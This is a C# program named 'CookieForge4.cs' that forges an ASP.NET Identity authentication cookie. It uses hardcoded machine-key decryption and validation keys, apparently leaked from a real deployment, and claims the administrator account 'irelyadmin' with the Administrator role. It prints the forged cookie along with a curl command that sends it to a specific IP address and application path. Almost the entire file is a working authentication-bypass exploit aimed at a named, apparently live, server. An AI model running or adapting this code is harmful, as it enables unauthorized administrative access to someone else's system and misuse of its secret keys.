// CookieForge4.cs — Uses AspNetTicketDataFormat from Interop // AspNetTicketDataFormat(IExceptionHandler) — constructor takes IDataProtector // DataProtectorShim is the IDataProtector implementation using System; using System.Collections.Generic; using System.Security.Claims; using Microsoft.Owin.Security; using Microsoft.Owin.Security.Interop; class Program { static void Main(string[] args) { string decKeyHex = "304DCCF3428FB1D39BCBCED801804B829F5BCD4D0E46A0E923AEFD427D9026E7"; string valKeyHex = "632EF20769E89AD1EEF7C18D3AAFFDC07B8D8241A1DAD922C27FFCC57F0A16DAC26AB5C4DF83CEE7289615849BE8FF369A41"; byte[] decKey = HexToBytes(decKeyHex); byte[] valKey = HexToBytes(valKeyHex); var claims = new List { new Claim(ClaimTypes.Name, "irelyadmin"), new Claim(ClaimTypes.NameIdentifier, "1"), new Claim(ClaimTypes.Role, "Administrator"), new Claim("http://schemas.microsoft.com/accesscontrolservice/2010/07/claims/identityprovider", "idsrv3test"), new Claim("Company", "01"), new Claim("UserId", "1"), new Claim("intRoleId", "1"), new Claim("intUserRoleID", "1"), }; var identity = new ClaimsIdentity(claims, "ApplicationCookie", ClaimTypes.Name, ClaimTypes.Role); var props = new AuthenticationProperties { IssuedUtc = DateTimeOffset.UtcNow, ExpiresUtc = DateTimeOffset.UtcNow.AddHours(1), }; props.Dictionary[".AspNet.Identity.UserId"] = "1"; props.Dictionary[".AspNet.Identity.UserName"] = "irelyadmin"; var ticket = new AuthenticationTicket(identity, props); // DataProtectorShim: wraps MachineKey protect/unprotect // Constructor: DataProtectorShim(string[] purposes, byte[] decryptionKey, byte[] validationKey, string decryptionAlgorithm, string validationAlgorithm) var protector = new DataProtectorShim( new string[] { "Microsoft.AspNet.Identity.Application" }, decryptionKey: decKey, validationKey: valKey, decryptionAlgorithm: "AES", validationAlgorithm: "HMACSHA256"); var format = new AspNetTicketDataFormat(protector); string cookieValue = format.Protect(ticket); Console.WriteLine("=== FORGED .AspNet.ApplicationCookie ==="); Console.WriteLine($"Cookie length: {cookieValue.Length} chars"); Console.WriteLine(); Console.WriteLine("Cookie:"); Console.WriteLine(cookieValue); Console.WriteLine(); Console.WriteLine("=== TEST COMMAND ==="); Console.WriteLine($"curl -sS -D - -b \".AspNet.ApplicationCookie={cookieValue}\" http://50.21.183.111/2210CherryEnergyUAP1/"); } static byte[] HexToBytes(string hex) { byte[] bytes = new byte[hex.Length / 2]; for (int i = 0; i < hex.Length; i += 2) bytes[i / 2] = Convert.ToByte(hex.Substring(i, 2), 16); return bytes; } }